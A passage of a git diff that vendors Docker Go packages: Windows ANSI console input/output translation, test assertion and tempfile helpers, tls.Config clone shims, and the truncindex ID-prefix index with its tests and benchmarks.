+++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
@@ -0,0 +1,263 @@
+// +build windows
+
+package windows
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"unsafe"
+
+	ansiterm "github.com/Azure/go-ansiterm"
+	"github.com/Azure/go-ansiterm/winterm"
+)
+
+const (
+	escapeSequence = ansiterm.KEY_ESC_CSI
+)
+
+// ansiReader wraps a standard input file (e.g., os.Stdin) providing ANSI sequence translation.
+type ansiReader struct {
+	file     *os.File
+	fd       uintptr
+	buffer   []byte
+	cbBuffer int
+	command  []byte
+}
+
+// NewAnsiReader returns an io.ReadCloser that provides VT100 terminal emulation on top of a
+// Windows console input handle.
+func NewAnsiReader(nFile int) io.ReadCloser {
+	initLogger()
+	file, fd := winterm.GetStdFile(nFile)
+	return &ansiReader{
+		file:    file,
+		fd:      fd,
+		command: make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH),
+		buffer:  make([]byte, 0),
+	}
+}
+
+// Close closes the wrapped file.
+func (ar *ansiReader) Close() (err error) {
+	return ar.file.Close()
+}
+
+// Fd returns the file descriptor of the wrapped file.
+func (ar *ansiReader) Fd() uintptr {
+	return ar.fd
+}
+
+// Read reads up to len(p) bytes of translated input events into p.
+func (ar *ansiReader) Read(p []byte) (int, error) {
+	if len(p) == 0 {
+		return 0, nil
+	}
+
+	// Previously read bytes exist, read as much as we can and return
+	if len(ar.buffer) > 0 {
+		logger.Debugf("Reading previously cached bytes")
+
+		originalLength := len(ar.buffer)
+		copiedLength := copy(p, ar.buffer)
+
+		if copiedLength == originalLength {
+			ar.buffer = make([]byte, 0, len(p))
+		} else {
+			ar.buffer = ar.buffer[copiedLength:]
+		}
+
+		logger.Debugf("Read from cache p[%d]: % x", copiedLength, p)
+		return copiedLength, nil
+	}
+
+	// Read and translate key events
+	events, err := readInputEvents(ar.fd, len(p))
+	if err != nil {
+		return 0, err
+	} else if len(events) == 0 {
+		logger.Debug("No input events detected")
+		return 0, nil
+	}
+
+	keyBytes := translateKeyEvents(events, []byte(escapeSequence))
+
+	// Save excess bytes and right-size keyBytes
+	if len(keyBytes) > len(p) {
+		logger.Debugf("Received %d keyBytes, only room for %d bytes", len(keyBytes), len(p))
+		ar.buffer = keyBytes[len(p):]
+		keyBytes = keyBytes[:len(p)]
+	} else if len(keyBytes) == 0 {
+		logger.Debug("No key bytes returned from the translator")
+		return 0, nil
+	}
+
+	copiedLength := copy(p, keyBytes)
+	if copiedLength != len(keyBytes) {
+		return 0, errors.New("unexpected copy length encountered")
+	}
+
+	logger.Debugf("Read        p[%d]: % x", copiedLength, p)
+	logger.Debugf("Read keyBytes[%d]: % x", copiedLength, keyBytes)
+	return copiedLength, nil
+}
+
+// readInputEvents polls until at least one event is available.
+func readInputEvents(fd uintptr, maxBytes int) ([]winterm.INPUT_RECORD, error) {
+	// Determine the maximum number of records to retrieve
+	// -- Cast around the type system to obtain the size of a single INPUT_RECORD.
+	//    unsafe.Sizeof requires an expression vs. a type-reference; the casting
+	//    tricks the type system into believing it has such an expression.
+	recordSize := int(unsafe.Sizeof(*((*winterm.INPUT_RECORD)(unsafe.Pointer(&maxBytes)))))
+	countRecords := maxBytes / recordSize
+	if countRecords > ansiterm.MAX_INPUT_EVENTS {
+		countRecords = ansiterm.MAX_INPUT_EVENTS
+	} else if countRecords == 0 {
+		countRecords = 1
+	}
+	logger.Debugf("[windows] readInputEvents: Reading %v records (buffer size %v, record size %v)", countRecords, maxBytes, recordSize)
+
+	// Wait for and read input events
+	events := make([]winterm.INPUT_RECORD, countRecords)
+	nEvents := uint32(0)
+	eventsExist, err := winterm.WaitForSingleObject(fd, winterm.WAIT_INFINITE)
+	if err != nil {
+		return nil, err
+	}
+
+	if eventsExist {
+		err = winterm.ReadConsoleInput(fd, events, &nEvents)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	// Return a slice restricted to the number of returned records
+	logger.Debugf("[windows] readInputEvents: Read %v events", nEvents)
+	return events[:nEvents], nil
+}
+
+// KeyEvent Translation Helpers
+
+var arrowKeyMapPrefix = map[uint16]string{
+	winterm.VK_UP:    "%s%sA",
+	winterm.VK_DOWN:  "%s%sB",
+	winterm.VK_RIGHT: "%s%sC",
+	winterm.VK_LEFT:  "%s%sD",
+}
+
+var keyMapPrefix = map[uint16]string{
+	winterm.VK_UP:     "\x1B[%sA",
+	winterm.VK_DOWN:   "\x1B[%sB",
+	winterm.VK_RIGHT:  "\x1B[%sC",
+	winterm.VK_LEFT:   "\x1B[%sD",
+	winterm.VK_HOME:   "\x1B[1%s~", // showkey shows ^[[1
+	winterm.VK_END:    "\x1B[4%s~", // showkey shows ^[[4
+	winterm.VK_INSERT: "\x1B[2%s~",
+	winterm.VK_DELETE: "\x1B[3%s~",
+	winterm.VK_PRIOR:  "\x1B[5%s~",
+	winterm.VK_NEXT:   "\x1B[6%s~",
+	winterm.VK_F1:     "",
+	winterm.VK_F2:     "",
+	winterm.VK_F3:     "\x1B[13%s~",
+	winterm.VK_F4:     "\x1B[14%s~",
+	winterm.VK_F5:     "\x1B[15%s~",
+	winterm.VK_F6:     "\x1B[17%s~",
+	winterm.VK_F7:     "\x1B[18%s~",
+	winterm.VK_F8:     "\x1B[19%s~",
+	winterm.VK_F9:     "\x1B[20%s~",
+	winterm.VK_F10:    "\x1B[21%s~",
+	winterm.VK_F11:    "\x1B[23%s~",
+	winterm.VK_F12:    "\x1B[24%s~",
+}
+
+// translateKeyEvents converts the input events into the appropriate ANSI string.
+func translateKeyEvents(events []winterm.INPUT_RECORD, escapeSequence []byte) []byte {
+	var buffer bytes.Buffer
+	for _, event := range events {
+		if event.EventType == winterm.KEY_EVENT && event.KeyEvent.KeyDown != 0 {
+			buffer.WriteString(keyToString(&event.KeyEvent, escapeSequence))
+		}
+	}
+
+	return buffer.Bytes()
+}
+
+// keyToString maps the given input event record to the corresponding string.
+func keyToString(keyEvent *winterm.KEY_EVENT_RECORD, escapeSequence []byte) string {
+	if keyEvent.UnicodeChar == 0 {
+		return formatVirtualKey(keyEvent.VirtualKeyCode, keyEvent.ControlKeyState, escapeSequence)
+	}
+
+	_, alt, control := getControlKeys(keyEvent.ControlKeyState)
+	if control {
+		// TODO(azlinux): Implement following control sequences
+		// <Ctrl>-D  Signals the end of input from the keyboard; also exits current shell.
+		// <Ctrl>-H  Deletes the first character to the left of the cursor. Also called the ERASE key.
+		// <Ctrl>-Q  Restarts printing after it has been stopped with <Ctrl>-s.
+		// <Ctrl>-S  Suspends printing on the screen (does not stop the program).
+		// <Ctrl>-U  Deletes all characters on the current line. Also called the KILL key.
+		// <Ctrl>-E  Quits current command and creates a core
+
+	}
+
+	// <Alt>+Key generates ESC N Key
+	if !control && alt {
+		return ansiterm.KEY_ESC_N + strings.ToLower(string(keyEvent.UnicodeChar))
+	}
+
+	return string(keyEvent.UnicodeChar)
+}
+
+// formatVirtualKey converts a virtual key (e.g., up arrow) into the appropriate ANSI string.
+func formatVirtualKey(key uint16, controlState uint32, escapeSequence []byte) string {
+	shift, alt, control := getControlKeys(controlState)
+	modifier := getControlKeysModifier(shift, alt, control)
+
+	if format, ok := arrowKeyMapPrefix[key]; ok {
+		return fmt.Sprintf(format, escapeSequence, modifier)
+	}
+
+	if format, ok := keyMapPrefix[key]; ok {
+		return fmt.Sprintf(format, modifier)
+	}
+
+	return ""
+}
+
+// getControlKeys extracts the shift, alt, and ctrl key states.
+func getControlKeys(controlState uint32) (shift, alt, control bool) {
+	shift = 0 != (controlState & winterm.SHIFT_PRESSED)
+	alt = 0 != (controlState & (winterm.LEFT_ALT_PRESSED | winterm.RIGHT_ALT_PRESSED))
+	control = 0 != (controlState & (winterm.LEFT_CTRL_PRESSED | winterm.RIGHT_CTRL_PRESSED))
+	return shift, alt, control
+}
+
+// getControlKeysModifier returns the ANSI modifier for the given combination of control keys.
+func getControlKeysModifier(shift, alt, control bool) string {
+	if shift && alt && control {
+		return ansiterm.KEY_CONTROL_PARAM_8
+	}
+	if alt && control {
+		return ansiterm.KEY_CONTROL_PARAM_7
+	}
+	if shift && control {
+		return ansiterm.KEY_CONTROL_PARAM_6
+	}
+	if control {
+		return ansiterm.KEY_CONTROL_PARAM_5
+	}
+	if shift && alt {
+		return ansiterm.KEY_CONTROL_PARAM_4
+	}
+	if alt {
+		return ansiterm.KEY_CONTROL_PARAM_3
+	}
+	if shift {
+		return ansiterm.KEY_CONTROL_PARAM_2
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
new file mode 100644
index 0000000000..a3ce5697d9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go
@@ -0,0 +1,64 @@
+// +build windows
+
+package windows
+
+import (
+	"io"
+	"os"
+
+	ansiterm "github.com/Azure/go-ansiterm"
+	"github.com/Azure/go-ansiterm/winterm"
+)
+
+// ansiWriter wraps a standard output file (e.g., os.Stdout) providing ANSI sequence translation.
+type ansiWriter struct {
+	file           *os.File
+	fd             uintptr
+	infoReset      *winterm.CONSOLE_SCREEN_BUFFER_INFO
+	command        []byte
+	escapeSequence []byte
+	inAnsiSequence bool
+	parser         *ansiterm.AnsiParser
+}
+
+// NewAnsiWriter returns an io.Writer that provides VT100 terminal emulation on top of a
+// Windows console output handle.
+func NewAnsiWriter(nFile int) io.Writer {
+	initLogger()
+	file, fd := winterm.GetStdFile(nFile)
+	info, err := winterm.GetConsoleScreenBufferInfo(fd)
+	if err != nil {
+		return nil
+	}
+
+	parser := ansiterm.CreateParser("Ground", winterm.CreateWinEventHandler(fd, file))
+	logger.Infof("newAnsiWriter: parser %p", parser)
+
+	aw := &ansiWriter{
+		file:           file,
+		fd:             fd,
+		infoReset:      info,
+		command:        make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH),
+		escapeSequence: []byte(ansiterm.KEY_ESC_CSI),
+		parser:         parser,
+	}
+
+	logger.Infof("newAnsiWriter: aw.parser %p", aw.parser)
+	logger.Infof("newAnsiWriter: %v", aw)
+	return aw
+}
+
+func (aw *ansiWriter) Fd() uintptr {
+	return aw.fd
+}
+
+// Write writes len(p) bytes from p to the underlying data stream.
+func (aw *ansiWriter) Write(p []byte) (total int, err error) {
+	if len(p) == 0 {
+		return 0, nil
+	}
+
+	logger.Infof("Write: % x", p)
+	logger.Infof("Write: %s", string(p))
+	return aw.parser.Parse(p)
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go
new file mode 100644
index 0000000000..ca5c3b2e53
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go
@@ -0,0 +1,35 @@
+// +build windows
+
+package windows
+
+import (
+	"os"
+
+	"github.com/Azure/go-ansiterm/winterm"
+)
+
+// GetHandleInfo returns file descriptor and bool indicating whether the file is a console.
+func GetHandleInfo(in interface{}) (uintptr, bool) {
+	switch t := in.(type) {
+	case *ansiReader:
+		return t.Fd(), true
+	case *ansiWriter:
+		return t.Fd(), true
+	}
+
+	var inFd uintptr
+	var isTerminal bool
+
+	if file, ok := in.(*os.File); ok {
+		inFd = file.Fd()
+		isTerminal = IsConsole(inFd)
+	}
+	return inFd, isTerminal
+}
+
+// IsConsole returns true if the given file descriptor is a Windows Console.
+// The code assumes that GetConsoleMode will return an error for file descriptors that are not a console.
+func IsConsole(fd uintptr) bool {
+	_, e := winterm.GetConsoleMode(fd)
+	return e == nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go
new file mode 100644
index 0000000000..ce4cb5990e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go
@@ -0,0 +1,33 @@
+// These files implement ANSI-aware input and output streams for use by the Docker Windows client.
+// When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create
+// and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls.
+
+package windows
+
+import (
+	"io/ioutil"
+	"os"
+	"sync"
+
+	ansiterm "github.com/Azure/go-ansiterm"
+	"github.com/Sirupsen/logrus"
+)
+
+var logger *logrus.Logger
+var initOnce sync.Once
+
+func initLogger() {
+	initOnce.Do(func() {
+		logFile := ioutil.Discard
+
+		if isDebugEnv := os.Getenv(ansiterm.LogEnv); isDebugEnv == "1" {
+			logFile, _ = os.Create("ansiReaderWriter.log")
+		}
+
+		logger = &logrus.Logger{
+			Out:       logFile,
+			Formatter: new(logrus.TextFormatter),
+			Level:     logrus.DebugLevel,
+		}
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
new file mode 100644
index 0000000000..52aeab54ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go
@@ -0,0 +1,3 @@
+// This file is necessary to pass the Docker tests.
+
+package windows
diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
new file mode 100644
index 0000000000..6da8518a5e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go
@@ -0,0 +1,97 @@
+// Package assert contains functions for making assertions in unit tests
+package assert
+
+import (
+	"fmt"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"strings"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+// TestingT is an interface which defines the methods of testing.T that are
+// required by this package
+type TestingT interface {
+	Fatalf(string, ...interface{})
+}
+
+// Equal compare the actual value to the expected value and fails the test if
+// they are not equal.
+func Equal(t TestingT, actual, expected interface{}) {
+	if expected != actual {
+		fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual)
+	}
+}
+
+//EqualStringSlice compares two slices and fails the test if they do not contain
+// the same items.
+func EqualStringSlice(t TestingT, actual, expected []string) {
+	if len(actual) != len(expected) {
+		fatal(t, "Expected (length %d): %q\nActual (length %d): %q",
+			len(expected), expected, len(actual), actual)
+	}
+	for i, item := range actual {
+		if item != expected[i] {
+			fatal(t, "Slices differ at element %d, expected %q got %q",
+				i, expected[i], item)
+		}
+	}
+}
+
+// NilError asserts that the error is nil, otherwise it fails the test.
+func NilError(t TestingT, err error) {
+	if err != nil {
+		fatal(t, "Expected no error, got: %s", err.Error())
+	}
+}
+
+// DeepEqual compare the actual value to the expected value and fails the test if
+// they are not "deeply equal".
+func DeepEqual(t TestingT, actual, expected interface{}) {
+	if !reflect.DeepEqual(actual, expected) {
+		fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n",
+			expected, spew.Sdump(expected), actual, spew.Sdump(actual))
+	}
+}
+
+// Error asserts that error is not nil, and contains the expected text,
+// otherwise it fails the test.
+func Error(t TestingT, err error, contains string) {
+	if err == nil {
+		fatal(t, "Expected an error, but error was nil")
+	}
+
+	if !strings.Contains(err.Error(), contains) {
+		fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error())
+	}
+}
+
+// Contains asserts that the string contains a substring, otherwise it fails the
+// test.
+func Contains(t TestingT, actual, contains string) {
+	if !strings.Contains(actual, contains) {
+		fatal(t, "Expected '%s' to contain '%s'", actual, contains)
+	}
+}
+
+// NotNil fails the test if the object is nil
+func NotNil(t TestingT, obj interface{}) {
+	if obj == nil {
+		fatal(t, "Expected non-nil value.")
+	}
+}
+
+func fatal(t TestingT, format string, args ...interface{}) {
+	t.Fatalf(errorSource()+format, args...)
+}
+
+// See testing.decorate()
+func errorSource() string {
+	_, filename, line, ok := runtime.Caller(3)
+	if !ok {
+		return ""
+	}
+	return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line)
+}
diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go
new file mode 100644
index 0000000000..110b2e6a79
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/testutil/pkg.go
@@ -0,0 +1 @@
+package testutil
diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
new file mode 100644
index 0000000000..0e09d99dae
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go
@@ -0,0 +1,36 @@
+package tempfile
+
+import (
+	"io/ioutil"
+	"os"
+
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+// TempFile is a temporary file that can be used with unit tests. TempFile
+// reduces the boilerplate setup required in each test case by handling
+// setup errors.
+type TempFile struct {
+	File *os.File
+}
+
+// NewTempFile returns a new temp file with contents
+func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile {
+	file, err := ioutil.TempFile("", prefix+"-")
+	assert.NilError(t, err)
+
+	_, err = file.Write([]byte(content))
+	assert.NilError(t, err)
+	file.Close()
+	return &TempFile{File: file}
+}
+
+// Name returns the filename
+func (f *TempFile) Name() string {
+	return f.File.Name()
+}
+
+// Remove removes the file
+func (f *TempFile) Remove() {
+	os.Remove(f.Name())
+}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
new file mode 100644
index 0000000000..e4dec3a5d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go
@@ -0,0 +1,11 @@
+// +build go1.8
+
+package tlsconfig
+
+import "crypto/tls"
+
+// Clone returns a clone of tls.Config. This function is provided for
+// compatibility for go1.7 that doesn't include this method in stdlib.
+func Clone(c *tls.Config) *tls.Config {
+	return c.Clone()
+}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
new file mode 100644
index 0000000000..0b816650ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go
@@ -0,0 +1,31 @@
+// +build go1.6,!go1.7
+
+package tlsconfig
+
+import "crypto/tls"
+
+// Clone returns a clone of tls.Config. This function is provided for
+// compatibility for go1.6 that doesn't include this method in stdlib.
+func Clone(c *tls.Config) *tls.Config {
+	return &tls.Config{
+		Rand:                     c.Rand,
+		Time:                     c.Time,
+		Certificates:             c.Certificates,
+		NameToCertificate:        c.NameToCertificate,
+		GetCertificate:           c.GetCertificate,
+		RootCAs:                  c.RootCAs,
+		NextProtos:               c.NextProtos,
+		ServerName:               c.ServerName,
+		ClientAuth:               c.ClientAuth,
+		ClientCAs:                c.ClientCAs,
+		InsecureSkipVerify:       c.InsecureSkipVerify,
+		CipherSuites:             c.CipherSuites,
+		PreferServerCipherSuites: c.PreferServerCipherSuites,
+		SessionTicketsDisabled:   c.SessionTicketsDisabled,
+		SessionTicketKey:         c.SessionTicketKey,
+		ClientSessionCache:       c.ClientSessionCache,
+		MinVersion:               c.MinVersion,
+		MaxVersion:               c.MaxVersion,
+		CurvePreferences:         c.CurvePreferences,
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
new file mode 100644
index 0000000000..0d5b448fec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go
@@ -0,0 +1,33 @@
+// +build go1.7,!go1.8
+
+package tlsconfig
+
+import "crypto/tls"
+
+// Clone returns a clone of tls.Config. This function is provided for
+// compatibility for go1.7 that doesn't include this method in stdlib.
+func Clone(c *tls.Config) *tls.Config {
+	return &tls.Config{
+		Rand:                        c.Rand,
+		Time:                        c.Time,
+		Certificates:                c.Certificates,
+		NameToCertificate:           c.NameToCertificate,
+		GetCertificate:              c.GetCertificate,
+		RootCAs:                     c.RootCAs,
+		NextProtos:                  c.NextProtos,
+		ServerName:                  c.ServerName,
+		ClientAuth:                  c.ClientAuth,
+		ClientCAs:                   c.ClientCAs,
+		InsecureSkipVerify:          c.InsecureSkipVerify,
+		CipherSuites:                c.CipherSuites,
+		PreferServerCipherSuites:    c.PreferServerCipherSuites,
+		SessionTicketsDisabled:      c.SessionTicketsDisabled,
+		SessionTicketKey:            c.SessionTicketKey,
+		ClientSessionCache:          c.ClientSessionCache,
+		MinVersion:                  c.MinVersion,
+		MaxVersion:                  c.MaxVersion,
+		CurvePreferences:            c.CurvePreferences,
+		DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled,
+		Renegotiation:               c.Renegotiation,
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
new file mode 100644
index 0000000000..02610b8b7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go
@@ -0,0 +1,137 @@
+// Package truncindex provides a general 'index tree', used by Docker
+// in order to be able to reference containers by only a few unambiguous
+// characters of their id.
+package truncindex
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+	"sync"
+
+	"github.com/tchap/go-patricia/patricia"
+)
+
+var (
+	// ErrEmptyPrefix is an error returned if the prefix was empty.
+	ErrEmptyPrefix = errors.New("Prefix can't be empty")
+
+	// ErrIllegalChar is returned when a space is in the ID
+	ErrIllegalChar = errors.New("illegal character: ' '")
+
+	// ErrNotExist is returned when ID or its prefix not found in index.
+	ErrNotExist = errors.New("ID does not exist")
+)
+
+// ErrAmbiguousPrefix is returned if the prefix was ambiguous
+// (multiple ids for the prefix).
+type ErrAmbiguousPrefix struct {
+	prefix string
+}
+
+func (e ErrAmbiguousPrefix) Error() string {
+	return fmt.Sprintf("Multiple IDs found with provided prefix: %s", e.prefix)
+}
+
+// TruncIndex allows the retrieval of string identifiers by any of their unique prefixes.
+// This is used to retrieve image and container IDs by more convenient shorthand prefixes.
+type TruncIndex struct {
+	sync.RWMutex
+	trie *patricia.Trie
+	ids  map[string]struct{}
+}
+
+// NewTruncIndex creates a new TruncIndex and initializes with a list of IDs.
+func NewTruncIndex(ids []string) (idx *TruncIndex) {
+	idx = &TruncIndex{
+		ids: make(map[string]struct{}),
+
+		// Change patricia max prefix per node length,
+		// because our len(ID) always 64
+		trie: patricia.NewTrie(patricia.MaxPrefixPerNode(64)),
+	}
+	for _, id := range ids {
+		idx.addID(id)
+	}
+	return
+}
+
+func (idx *TruncIndex) addID(id string) error {
+	if strings.Contains(id, " ") {
+		return ErrIllegalChar
+	}
+	if id == "" {
+		return ErrEmptyPrefix
+	}
+	if _, exists := idx.ids[id]; exists {
+		return fmt.Errorf("id already exists: '%s'", id)
+	}
+	idx.ids[id] = struct{}{}
+	if inserted := idx.trie.Insert(patricia.Prefix(id), struct{}{}); !inserted {
+		return fmt.Errorf("failed to insert id: %s", id)
+	}
+	return nil
+}
+
+// Add adds a new ID to the TruncIndex.
+func (idx *TruncIndex) Add(id string) error {
+	idx.Lock()
+	defer idx.Unlock()
+	if err := idx.addID(id); err != nil {
+		return err
+	}
+	return nil
+}
+
+// Delete removes an ID from the TruncIndex. If there are multiple IDs
+// with the given prefix, an error is thrown.
+func (idx *TruncIndex) Delete(id string) error {
+	idx.Lock()
+	defer idx.Unlock()
+	if _, exists := idx.ids[id]; !exists || id == "" {
+		return fmt.Errorf("no such id: '%s'", id)
+	}
+	delete(idx.ids, id)
+	if deleted := idx.trie.Delete(patricia.Prefix(id)); !deleted {
+		return fmt.Errorf("no such id: '%s'", id)
+	}
+	return nil
+}
+
+// Get retrieves an ID from the TruncIndex. If there are multiple IDs
+// with the given prefix, an error is thrown.
+func (idx *TruncIndex) Get(s string) (string, error) {
+	if s == "" {
+		return "", ErrEmptyPrefix
+	}
+	var (
+		id string
+	)
+	subTreeVisitFunc := func(prefix patricia.Prefix, item patricia.Item) error {
+		if id != "" {
+			// we haven't found the ID if there are two or more IDs
+			id = ""
+			return ErrAmbiguousPrefix{prefix: string(prefix)}
+		}
+		id = string(prefix)
+		return nil
+	}
+
+	idx.RLock()
+	defer idx.RUnlock()
+	if err := idx.trie.VisitSubtree(patricia.Prefix(s), subTreeVisitFunc); err != nil {
+		return "", err
+	}
+	if id != "" {
+		return id, nil
+	}
+	return "", ErrNotExist
+}
+
+// Iterate iterates over all stored IDs, and passes each of them to the given handler.
+func (idx *TruncIndex) Iterate(handler func(id string)) {
+	idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error {
+		handler(string(prefix))
+		return nil
+	})
+}
diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
new file mode 100644
index 0000000000..8197baf7d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go
@@ -0,0 +1,429 @@
+package truncindex
+
+import (
+	"math/rand"
+	"testing"
+
+	"github.com/docker/docker/pkg/stringid"
+)
+
+// Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix.
+func TestTruncIndex(t *testing.T) {
+	ids := []string{}
+	index := NewTruncIndex(ids)
+	// Get on an empty index
+	if _, err := index.Get("foobar"); err == nil {
+		t.Fatal("Get on an empty index should return an error")
+	}
+
+	// Spaces should be illegal in an id
+	if err := index.Add("I have a space"); err == nil {
+		t.Fatalf("Adding an id with ' ' should return an error")
+	}
+
+	id := "99b36c2c326ccc11e726eee6ee78a0baf166ef96"
+	// Add an id
+	if err := index.Add(id); err != nil {
+		t.Fatal(err)
+	}
+
+	// Add an empty id (should fail)
+	if err := index.Add(""); err == nil {
+		t.Fatalf("Adding an empty id should return an error")
+	}
+
+	// Get a non-existing id
+	assertIndexGet(t, index, "abracadabra", "", true)
+	// Get an empty id
+	assertIndexGet(t, index, "", "", true)
+	// Get the exact id
+	assertIndexGet(t, index, id, id, false)
+	// The first letter should match
+	assertIndexGet(t, index, id[:1], id, false)
+	// The first half should match
+	assertIndexGet(t, index, id[:len(id)/2], id, false)
+	// The second half should NOT match
+	assertIndexGet(t, index, id[len(id)/2:], "", true)
+
+	id2 := id[:6] + "blabla"
+	// Add an id
+	if err := index.Add(id2); err != nil {
+		t.Fatal(err)
+	}
+	// Both exact IDs should work
+	assertIndexGet(t, index, id, id, false)
+	assertIndexGet(t, index, id2, id2, false)
+
+	// 6 characters or less should conflict
+	assertIndexGet(t, index, id[:6], "", true)
+	assertIndexGet(t, index, id[:4], "", true)
+	assertIndexGet(t, index, id[:1], "", true)
+
+	// An ambiguous id prefix should return an error
+	if _, err := index.Get(id[:4]); err == nil {
+		t.Fatal("An ambiguous id prefix should return an error")
+	}
+
+	// 7 characters should NOT conflict
+	assertIndexGet(t, index, id[:7], id, false)
+	assertIndexGet(t, index, id2[:7], id2, false)
+
+	// Deleting a non-existing id should return an error
+	if err := index.Delete("non-existing"); err == nil {
+		t.Fatalf("Deleting a non-existing id should return an error")
+	}
+
+	// Deleting an empty id should return an error
+	if err := index.Delete(""); err == nil {
+		t.Fatal("Deleting an empty id should return an error")
+	}
+
+	// Deleting id2 should remove conflicts
+	if err := index.Delete(id2); err != nil {
+		t.Fatal(err)
+	}
+	// id2 should no longer work
+	assertIndexGet(t, index, id2, "", true)
+	assertIndexGet(t, index, id2[:7], "", true)
+	assertIndexGet(t, index, id2[:11], "", true)
+
+	// conflicts between id and id2 should be gone
+	assertIndexGet(t, index, id[:6], id, false)
+	assertIndexGet(t, index, id[:4], id, false)
+	assertIndexGet(t, index, id[:1], id, false)
+
+	// non-conflicting substrings should still not conflict
+	assertIndexGet(t, index, id[:7], id, false)
+	assertIndexGet(t, index, id[:15], id, false)
+	assertIndexGet(t, index, id, id, false)
+
+	assertIndexIterate(t)
+}
+
+func assertIndexIterate(t *testing.T) {
+	ids := []string{
+		"19b36c2c326ccc11e726eee6ee78a0baf166ef96",
+		"28b36c2c326ccc11e726eee6ee78a0baf166ef96",
+		"37b36c2c326ccc11e726eee6ee78a0baf166ef96",
+		"46b36c2c326ccc11e726eee6ee78a0baf166ef96",
+	}
+
+	index := NewTruncIndex(ids)
+
+	index.Iterate(func(targetId string) {
+		for _, id := range ids {
+			if targetId == id {
+				return
+			}
+		}
+
+		t.Fatalf("An unknown ID '%s'", targetId)
+	})
+}
+
+func assertIndexGet(t *testing.T, index *TruncIndex, input, expectedResult string, expectError bool) {
+	if result, err := index.Get(input); err != nil && !expectError {
+		t.Fatalf("Unexpected error getting '%s': %s", input, err)
+	} else if err == nil && expectError {
+		t.Fatalf("Getting '%s' should return an error, not '%s'", input, result)
+	} else if result != expectedResult {
+		t.Fatalf("Getting '%s' returned '%s' instead of '%s'", input, result, expectedResult)
+	}
+}
+
+func BenchmarkTruncIndexAdd100(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 100; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexAdd250(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 250; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexAdd500(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 500; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
